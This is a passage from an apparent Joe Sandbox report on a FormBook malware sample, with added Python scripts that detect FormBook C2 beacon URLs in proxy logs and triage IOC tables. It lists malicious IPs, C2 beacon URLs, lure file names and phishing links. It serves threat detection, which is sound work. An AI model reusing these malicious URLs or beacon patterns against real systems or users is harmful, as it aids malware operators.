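    """Regex for grepping raw logs; parameter order is free (one lookahead each)."""
    path, keys, consts = prof
    looks = ""
    for k in keys:
        val = re.escape(consts[k]) if k in consts else r"[^&\s]+"
        looks += rf"(?=\?(?:[^\s]*&)?{re.escape(k)}={val}(?:&|\s|$))"
    return re.compile(rf"https?://[^/\s]+{re.escape(path)}{looks}\?")


def scan(log, prof):
    """Return (client, host) for every proxy log line whose URL fits the profile."""
    hits = []
    for line in log.splitlines():
        fields = line.split()
        if len(fields) >= 4 and is_beacon(fields[3], prof):
            hits.append((fields[1], urlsplit(fields[3]).hostname))
    return hits


if __name__ == "__main__":
    prof = profile(C2_URLS)
    print("shared profile:", prof)
    print("grep regex:", to_regex(prof).pattern)
    for client, host in scan(PROXY_LOG, prof):
        print(f"beacon from {client} to {host}")
```

The regex is deliberately anchored on the path and on the constant SP value rather than on the four hostnames, since FormBook operators rotate domains far faster than they rebuild the client; it will not catch a rebuilt sample with a new path, which is the trade-off of any per-build network IOC. The parser-based scan() is what you would put behind a SIEM rule, where the URL is already a field; to_regex() is for grepping flat proxy logs.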

                            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | raserver.exe, 00000004.00000002.506812727.000000000574F000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vOKMFxiCYt.exe, 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.49.23.141 | unknown | United States | 53831 | SQUARESPACEUS | false
162.0.232.118 | unknown | Canada | 22612 | NAMECHEAP-NETUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
3.138.72.189 | unknown | United States | 16509 | AMAZON-02US | false

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:321296
                                                    Start date:20.11.2020
                                                    Start time:20:03:25
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 17s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type: light
                                                    Sample file name: vOKMFxiCYt.exe
                                                    Cookbook file name: default.jbs
                                                    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of new started processes analysed: 24
                                                    Number of new started drivers analysed: 0
                                                    Number of existing processes analysed: 0
                                                    Number of existing drivers analysed: 0
                                                    Number of injected processes analysed: 1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode: default
                                                    Analysis stop reason: Timeout
                                                    Detection: MAL
                                                    Classification: mal100.troj.evad.winEXE@7/1@4/4
                                                    EGA Information: Failed
                                                    HDC Information:
                                                    • Successful, ratio: 32.2% (good quality ratio 29.2%)
                                                    • Quality average: 72.4%
                                                    • Quality standard deviation: 31.5%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.139.144, 13.88.21.125, 168.61.161.212, 2.18.68.82, 51.104.139.180, 20.54.26.129, 8.241.121.126, 8.253.95.120, 8.241.121.254, 8.241.11.254, 8.248.115.254, 92.122.213.247, 92.122.213.194, 51.132.208.181
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, a-0001.a-afdentry.net.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/321296/sample/vOKMFxiCYt.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    Time | Type | Description
                                                    20:04:29 | API Interceptor | 1x Sleep call for process: vOKMFxiCYt.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    Match, then per row: Associated Sample Name / URL | Detection | Context
                                                    Match: 198.49.23.141
                                                    • BANK ACCOUNT INFO!.exe | malicious | www.katrinarask.com/sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2
                                                    • Payment Advice - Advice Ref GLV823990339.exe | malicious | www.floresereis.com/gyo3/?Ez=PS6J2QmalNJ2YJDjbe69AvUeFdUcpOy/3pEgziSDPBkUWsWS6mOmijOfudAWg7zfBEC1B5r2MQ==&lhud=TjfdU2S
                                                    • http://f69e.engage.squarespace-mail.com | malicious | f69e.engage.squarespace-mail.com/
                                                    • dB7XQuemMc.exe | malicious | www.missteenroyaluniverse.com/nt8e/?wfv=ZReo2Pt2Qe1/UCtjKFtXHq3RWUOi2Gm/wCbn0tZxqkEIYA02TnYAkFkYrty+KIrZCZ6r&Tj=yrIt
                                                    • hRVrTsMv25.exe | malicious | www.qlifepharmacy.com/hko6/?XVJpkDH8=GNi/DpI/o0IU2mlIts+MFBAG9T0dMGL590B2ep5La5xhQGCr0BB5YDI5YioaKEegNoVx&V8-DC=02JL1VL0CDLPLTE0
                                                    • NzI1oP5E74.exe | malicious | www.kayapallisgaard.com/igqu/?v6=+FdV/Kd4fGUiBuWYNlWEm7YK8cxavEbtySDgdYvfxIiidE6desXWnlu2B7HA/iyauFln7ZyoAg==&1b=V6O83JaPw
                                                    • PO.exe | malicious | www.unusualdawg.com/9d1o/?1bm=QkXoOVVmg24y7wxEBap6bO8f6UGaNui7YjNJ7V3V8x8CyLlwzZoXh9kyUu+YoqOVbj3TZFChrA==&sZRd=pBiHDjuxCVPXGhYp
                                                    • KZ7qjnBlZF.exe | malicious | www.haloheartdachshunds.com/sub/?ndndn4=RVlTij&AR5=XFWzbX0ToqWBjEsf26ufL7Xq5jBuxaIMiFZhysx3UIjI7XvmT/Bu5040hGTugKhDCWzPxOW3Cg==
                                                    Match: 34.102.136.180
                                                    • Order List.xlsx | malicious | www.crimson.school/o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg==
                                                    • Purchase Order 40,7045$.exe | malicious | www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr
                                                    • invoice.exe | malicious | www.laborexchanges.com/saf0/?UnSpxn_=BtLohM+uB3q4k/LlKf4h6h9jKhMOWhQYAUT20pwPFuxXeQimTiRkUGHppPy1CbtFE5UV&nHux40=pRmTZBcPIFQHkvP0
                                                    • TR-D45.pdf.exe | malicious | www.gcvinternational.com/gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi
                                                    • 86dXpRWnFG.exe | malicious | www.powderedsilk.com/ogg/?FdtP=yL0l42d8z4u&JfspOLvH=fOCM8bU6nldV/iwSncfaF5Bzy/lGPGgo/g5DGIZRlu3EMk3UROnm6TGL4YPAlMSLjacD
                                                    • LIST OF PRODUCTS NEEDED.exe | malicious | www.present-motherhood.com/pna/?oXN=7nbLudZHS&wP9=pAJh36KDGKuozQ+wlnL4iaUZacIoIbb12I26NWSsGNXaprJ2jX+VR1VHCYeoOV3CYcpo
                                                    • Order specs19.11.20.exe | malicious | www.overstockalpine.com/nwrr/?cj=Nc1MB4yErYgRagn/HzK3hScSsYEBegMtx+kEQv9TefYD7E7OGiE02SCDOI6eM3Hv09tUJ3eV9Q==&Rxo=L6hH4NIhfjzT
                                                    • Okwt8fW5KH.exe | malicious | www.mybriefbox.com/sdk/?AP=KzrxE&kzut2Pv=ieC5SQ4WTCMGwLwKeHkkTkUTO60lnbNinIRTqFa5Tgq0ajZ12E69OSpNqOiQRcX/surf
                                                    • Purchase Order 40,7045.exe | malicious | www.onlineshoppingisbest.com/igqu/?YnztXrjp=cAw+48JGWTFWiF+zD75YoKcSRGv0/cbX2CyjAL3BYh15xmcIYagPiXPUr4/0BC838prH&sBZxwb=FxlXFP2PHdiD2
                                                    • Payment Advice - Advice Ref GLV823990339.exe | malicious | www.brilliance-automation.com/gyo3/?Ez=XAbIWkmCD7FprhBGM/1VWQtkWKjPoo+hixDnJGBEsGUo9CkrVpkcDmC1vi0ujf808Qfd1id09g==&lhud=TjfdU2S
                                                    • Purchase Order 40,7045$.exe | malicious | www.rockinglifefromhome.com/igqu/?afo=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORGuicEzVgEw0Hp6jQ==&DHU4SX=gbT8543hIhm
                                                    • MV.KMTC JEBEL ALI_pdf.exe | malicious | www.mereziboutique.com/y9z/?uFQl=hX/JgwGUf2blPgyiHp8pkr0UcN4JhiEs10p3+69z9DK69Gln3SJoRK9DZHZ4ze7gp3+f&CTvp=fv10_lYhrxJtW6
                                                    • SWIFT_HSBC Bank.exe | malicious | www.homewellliving.com/nt8e/?7nwltvxh=y2sdQ9Xb5ECC4UyPumlTTMs33wxYtaLvB/dO1hyuc+aLkGir7cEA1isigJn19hEFQwDS&org=3foxnfCXOnIhKD
                                                    • 23692 ANRITSU PROBE po 29288.exe | malicious | www.funeralfermentarium.com/9d1o/?lvH8U=Wears+I1XvB+Lmut0rGzY9wAFTAHH41k5OVIheQSGxmq0oO+QWZXKPOXziEsAnWJSQrEFn+Exw==&E6A=8pDxC4
                                                    • PO0119-1620 LQSB 0320 Siemens.exe | malicious | www.guillermoastiazaran.com/sppe/?DnadT=x+bcW4Gq4Sa+8Fw3ruRe02HfSBDGbo9y1yLk6wxIyT1lxw5Q+sxUrgb1tDfRR28VG68C&DxlLi=2dmX
                                                    • KYC_DOC_.EXE | malicious | www.packorganically.com/bw82/?CXrL=77CCBBr2/49gWL5yauZnKqdCED7z+VtJXat/kGRZ6Qnjpe6WQ1Ax9xdsmUB8H+4disGx&llvxw=fTAlUHeHDVNhYV
                                                    • PO0119-1620 LQSB 0320 Siemens.exe | malicious | www.bullwingsgt.com/sppe/?00D=NB3Dd/vOM6aQ3m0lcddBYOe/MXAC8Z/KQ2ZGmCsq6hDofgl0Po6pPua8TNWmH6LR2TRn&w48H=qBZ83x7XYlyP0lo0
                                                    • ant.exe | malicious | www.spidermenroofsupport.com/94sb/?8pMt5xHX=C9biJKOafB1QzsexO7xJmKpRIYJMQj6VpKItH4wgGF+KF++s1hKyu2EaSVFJqiHWuFvG&GzrT=Wb1LdRq8x
                                                    • PROOF OF PAYMENT.exe | malicious | www.prideaffiliate.com/mua8/?w48t=0pY022IXUBwLfpfP&nflpdH=Vm4JrPClk0aQj+jhcdONVb3zc5GtcUOmsZyrOc+k5NW+jXUcqcFsSwfT9cazrXQd7qcZ
                                                    • DEBIT NOTE DB-1130.exe | malicious | www.knotgardenlifestylings.com/ihm3/?sBZ4lrK=PS39z8PEw7TzfNOCiLKd1OXoS8/GfzxzB5O+ulo0NmPTjwXimFWvt/sJkvH86VVEya1bUCOS1g==&FPcT7b=djCDfFRXOP7H
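The context URLs in the IPs table share one shape: a short single-segment directory under the host, followed by two query parameters, one of which carries a long base64-looking value. The script below is an added example, not part of the Joe Sandbox report and not a Joe Sandbox rule: it parses a few rows constructed from the table, flags URLs with that shape, and reduces them to host-plus-directory indicators for blocking. The directory and value-length thresholds are the editor's heuristic; adjust them against your own FormBook telemetry.

```python
"""Triage helper for the Joe Sandbox "IPs" context table above (added example)."""
import re
from urllib.parse import urlsplit

# Constructed from rows of the IPs table above: (match IP, sample, context URL).
CONTEXT_ROWS = [
    ("198.49.23.141", "BANK ACCOUNT INFO!.exe",
     "www.katrinarask.com/sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2"),
    ("198.49.23.141", "http://f69e.engage.squarespace-mail.com",
     "f69e.engage.squarespace-mail.com/"),
    ("198.49.23.141", "KZ7qjnBlZF.exe",
     "www.haloheartdachshunds.com/sub/?ndndn4=RVlTij&AR5=XFWzbX0ToqWBjEsf26ufL7Xq5jBuxaIMiFZhysx3UIjI7XvmT/Bu5040hGTugKhDCWzPxOW3Cg=="),
    ("34.102.136.180", "Order List.xlsx",
     "www.crimson.school/o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg=="),
]

# Heuristic thresholds (editor's assumption, derived from the rows above):
# one short lowercase alphanumeric directory, and a base64-alphabet value of
# at least 40 characters in one of exactly two query parameters.
DIR_RE = re.compile(r"^/[a-z0-9]{2,5}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def split_query(query):
    """Split a query string without decoding it.

    urllib.parse.parse_qsl turns '+' into a space and percent-decodes, which
    corrupts base64 payload values, so the split is done by hand and only the
    first '=' separates key from value (values may legitimately end in '==').
    """
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def parse_context_url(url):
    """Return (host, path, params) for a report context URL (scheme optional)."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return parts.hostname, parts.path or "/", split_query(parts.query)


def looks_like_formbook_beacon(url):
    """True when the URL has the directory-plus-two-parameter beacon shape."""
    _host, path, params = parse_context_url(url)
    if not DIR_RE.match(path) or len(params) != 2:
        return False
    return any(B64_RE.match(value) for value in params.values())


def beacon_indicators(rows):
    """Reduce table rows to sorted (ip, host, directory) triples worth blocking."""
    found = set()
    for ip, _sample, url in rows:
        if looks_like_formbook_beacon(url):
            host, path, _params = parse_context_url(url)
            found.add((ip, host, path))
    return sorted(found)


if __name__ == "__main__":
    for ip, host, path in beacon_indicators(CONTEXT_ROWS):
        print(f"{ip:16} {host}{path}")
```

The plain squarespace-mail.com entry is dropped because its path is "/" and it carries no parameters; the three beacon-shaped rows survive as host-plus-directory pairs, which is the granularity at which these campaigns rotate (the same directory, for example igqu or gyo3, recurs across several hosts in the table).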

                                                    Domains

                                                    Match, then per row: Associated Sample Name / URL | Detection | Context
                                                    Match: ext-cust.squarespace.com
                                                    • Payment Advice - Advice Ref GLV823990339.exe | malicious | 198.49.23.141
                                                    • NEW PO.exe | malicious | 198.185.159.141
                                                    • Quotation.exe | malicious | 198.185.159.145
                                                    • PO#646756575646.exe | malicious | 198.49.23.145
                                                    • PO#646756575646.exe | malicious | 198.185.159.145
                                                    • PO8479349743085.exe | malicious | 198.185.159.144
                                                    • PO8479349743085.exe | malicious | 198.185.159.145
                                                    • PO8479349743085.exe | malicious | 198.49.23.144
                                                    • vSCyL8NNIC.exe | malicious | 198.185.159.145
                                                    • plusnew.exe | malicious | 198.49.23.144
                                                    • Shipping Documents.exe | malicious | 198.185.159.145
                                                    • invoice.exe | malicious | 198.185.159.144
                                                    • http://39unitedfrkesokoriorimiwsdystreetsmghg.duckdns.org/chnsfrnd1/vbc.exe | malicious | 198.185.159.145
                                                    • sample.exe | malicious | 198.49.23.145
                                                    • bXdiOPDmyZ.exe | malicious | 198.185.159.144
                                                    • ZN10856678GB.exe | malicious | 198.185.159.144
                                                    • document2811.exe | malicious | 198.185.159.144
                                                    • 15Delivery_Notification_00562947.doc.js | malicious | 198.49.23.145
                                                    • 15Delivery_Notification_00562947.doc.js | malicious | 198.185.159.145
                                                    • http://curated.fieldtest.cc/ | malicious | 198.185.159.144
                                                    Match: prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                                                    • Purchase Order 40,7045$.exe | malicious | 3.12.202.18
                                                    • Payment Advice - Advice Ref GLV823990339.exe | malicious | 3.134.22.63
                                                    • udtiZ6qM4s.exe | malicious | 3.12.202.18
                                                    • uM0FDMSqE2.exe | malicious | 3.12.202.18
                                                    • new file.exe.exe | malicious | 3.12.202.18
                                                    • jrzlwOa0UC.exe | malicious | 3.134.22.63
                                                    • 9Ul8m9FQ47.exe | malicious | 3.138.72.189
                                                    • XCnhrl4qRO.exe | malicious | 3.12.202.18
                                                    • feJbFA6woA.exe | malicious | 3.138.72.189
                                                    • RfqYEW3Oc5.exe | malicious | 3.138.72.189
                                                    • w4fNtjZBEH.exe | malicious | 3.12.202.18
                                                    • Purchase Order 40,7045$.exe | malicious | 3.12.202.18
                                                    • sXNQG9jqhR.exe | malicious | 3.12.202.18
                                                    • 0VikCnzrVT.exe | malicious | 3.134.22.63
                                                    • Purchase Order 40,7045$.exe | malicious | 3.138.72.189
                                                    • SOA109216.exe | malicious | 3.134.22.63
                                                    • KZ7qjnBlZF.exe | malicious | 3.134.22.63
                                                    • scnn7676766.exe | malicious | 3.138.72.189
                                                    • PI41006.exe | malicious | 3.18.25.61
                                                    • M11sVPvWUT.exe | malicious | 3.18.25.61

                                                    ASN

                                                    Match, then per row: Associated Sample Name / URL | Detection | Context
                                                    Match: GOOGLEUS
                                                    • com.fdhgkjhrtjkjbx.model.apk | malicious | 216.58.212.163
                                                    • http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.com | malicious | 172.217.16.193
                                                    • https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.com | malicious | 172.217.16.193
                                                    • https://docs.google.com/document/d/e/2PACX-1vS19QxlBmfgZPBsUyM3LjkhvVA-TJ0Z_P3J8f_cqg7VN4_zRcrthLeTjZzAubcBh9YWnC0ty3FtmofH/pub | malicious | 172.217.16.193
                                                    • https://sites.google.com/site/id500800931/googledrive/share/downloads/storage?FID=6937265496484 | malicious | 172.217.16.193
                                                    • https://docs.google.com/document/d/e/2PACX-1vSF_0NxJ4W_JaHZNaHV7imTfN6FtP563leR3WEEVqre35gDV9YM55P9l-6Y-B1gmL7J7GW--QSF89LQ/pub | malicious | 172.217.16.193
                                                    • https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-us | malicious | 172.217.23.161
                                                    • http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1 | malicious | 172.217.21.195
                                                    • https://bit.ly/35MTO80 | malicious | 172.217.23.161
                                                    • Order List.xlsx | malicious | 34.102.136.180
                                                    • BANK ACCOUNT INFO!.exe | malicious | 35.230.2.159
                                                    • http://global.krx.co.kr/board/GLB0205020100/bbs#view=649 | malicious | 108.177.15.155
                                                    • Purchase Order 40,7045$.exe | malicious | 34.102.136.180
                                                    • invoice.exe | malicious | 34.102.136.180
                                                    • TR-D45.pdf.exe | malicious | 34.102.136.180
                                                    • knitted yarn documents.exe | malicious | 172.253.120.109
                                                    • 86dXpRWnFG.exe | malicious | 34.102.136.180
                                                    • https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.php | malicious | 172.217.16.130
                                                    • b0408bca49c87f9e54bce76565bc6518.exe | malicious | 74.125.34.46
                                                    • b2e3bd67d738988ca1bbed8d8b3e73fc.exe | malicious | 74.125.34.46
                                                    Match: NAMECHEAP-NETUS
                                                    • http://rwiqipwvnklaqkuu.ltiliqhting.com/asci/SmFjcXVlbGluZS5TY2hyYWRlckByYWJvYmFuay5jb20= | malicious | 198.54.120.245
                                                    • Payment conflict- aptiv 082920134110.htm | malicious | 198.54.116.10
                                                    • Payment-244581781.doc | malicious | 198.187.29.39
                                                    • Order List.xlsx | malicious | 198.54.117.216
                                                    • https://u19114248.ct.sendgrid.net/ls/click?upn=1kMFt-2Foese19BdzKqBBNxmUiDNiO3l4ozyKR3JHYHjGXyXtR1YgfLizwybC7hwFoy4wlb-2FUZczInc9Ssmzz4dQ-3D-3DuU6r_TCf26aIMQHFUMJSqtVnzlcWBqfQpkiFxCOBj9heiSevnqRkiapxQjkatt3r5u5xw-2FNDgXhA220pIRwcKmyMneET98pBkuhL-2FUwJCaSrvE5mZhnMBtJdZf9Opljklq5t7Y-2BINqElPIJU8bjYLY27qV6L-2FSwA36husfmMqwKagSwOgE04FdniEmY9uEbym50XNhqKw9lgczv6HrSrYNm6ouXnIayW-2FSBLzGYxoTYKe6OA-3D | malicious | 198.54.114.178
                                                    • Certificates Profile Details Of Our Company And About Us.exe | malicious | 198.54.122.60
                                                    • Final-Payment-Receipt.exe | malicious | 162.0.236.49
                                                    • Payment Advice.xls | malicious | 185.61.154.32
                                                    • Payment Advice.xls | malicious | 185.61.154.32
                                                    • Payment Advice.xls | malicious | 185.61.154.32
                                                    • Documentation.478396766.doc | malicious | 198.187.31.83
                                                    • Documentation.478396766.doc | malicious | 192.64.118.88
                                                    • tl2gnGyMz6eLhZG.exe | malicious | 104.219.248.45
                                                    • Purchase Order 40,7045.exe | malicious | 185.61.154.55
                                                    • 74725794.no.exe | malicious | 198.54.122.60
                                                    • Payment Advice - Advice Ref GLV823990339.exe | malicious | 198.54.120.58
                                                    • invoice payment.exe | malicious | 185.61.154.32
                                                    • Certificates Profile Details Of Our Company.exe | malicious | 198.54.122.60
                                                    • https://lfonoumkgl.zizera.com/FX | malicious | 199.188.200.253
                                                    • xgarnica.exe | malicious | 198.54.122.60
                                                    Match: SQUARESPACEUS
                                                    • kayx.exe | malicious | 198.185.159.141
                                                    • BANK ACCOUNT INFO!.exe | malicious | 198.49.23.141
                                                    • http://WWW.ALYSSA-J-MILANO.COM | malicious | 198.185.159.141
                                                    • Payment Advice - Advice Ref GLV823990339.exe | malicious | 198.49.23.141
                                                    • baf6b9fcec491619b45c1dd7db56ad3d.exe | malicious | 198.49.23.177
                                                    • http://f69e.engage.squarespace-mail.com | malicious | 198.49.23.141
                                                    • NEW PO.exe | malicious | 198.185.159.141
                                                    • p8LV1eVFyO.exe | malicious | 198.49.23.177
                                                    • dB7XQuemMc.exe | malicious | 198.49.23.141
                                                    • hRVrTsMv25.exe | malicious | 198.49.23.141
                                                    • qkN4OZWFG6.exe | malicious | 198.185.159.144
                                                    • kvdYhqN3Nh.exe | malicious | 198.185.159.144
                                                    • NzI1oP5E74.exe | malicious | 198.49.23.141
                                                    • IQtvZjIdhN.exe | malicious | 198.49.23.177
                                                    • PO.exe | malicious | 198.49.23.141
                                                    • 148wWoi8vI.exe | malicious | 198.49.23.177
                                                    • H4A2-423-EM154-302.exe | malicious | 198.185.159.141
                                                    • KZ7qjnBlZF.exe | malicious | 198.49.23.141
                                                    • scnn7676766.exe | malicious | 198.185.159.144
                                                    • price quote.exe | malicious | 198.185.159.145

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vOKMFxiCYt.exe.log
                                                    Process: C:\Users\user\Desktop\vOKMFxiCYt.exe
                                                    File Type: ASCII text, with CRLF line terminators
                                                    Category: dropped
                                                    Size (bytes): 1314
                                                    Entropy (8bit): 5.350128552078965
                                                    Encrypted: false
                                                    SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                    MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                    SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                    SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                    SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                    Malicious: true
                                                    Reputation: high, very likely benign file
